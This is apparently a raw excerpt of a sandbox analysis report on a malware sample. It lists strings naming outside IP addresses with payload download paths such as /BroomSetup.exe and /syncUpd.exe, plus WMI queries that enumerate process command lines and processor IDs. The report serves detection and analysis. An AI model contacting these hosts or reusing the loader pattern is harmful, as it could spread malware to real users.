Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: @	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.90	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.90	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.90	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: Installed	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: Installed	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.59	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.59	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.203	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.203	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /syncUpd.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /syncUpd.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /timeSync.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /timeSync.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.203	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.59	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /timeSync.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /syncUpd.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /1/Package.zip	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /1/Package.zip	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /1/Package.zip	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .zip	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .zip	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: \run.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: \run.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /BroomSetup.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /BroomSetup.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /BroomSetup.exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_03694C75
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: .exe	0_2_03694C75

Source: sx8RE6LbG0.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4304
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4732
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3424
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5564
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6632
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1964
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6396
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2932
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6804
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2492
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 332
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1612
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3756
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 728
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1584
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 732
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5432
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2412
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4132
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2612
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5896
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2392
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4104
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3664
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1936
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7104
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 632
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1056
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1632
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5360
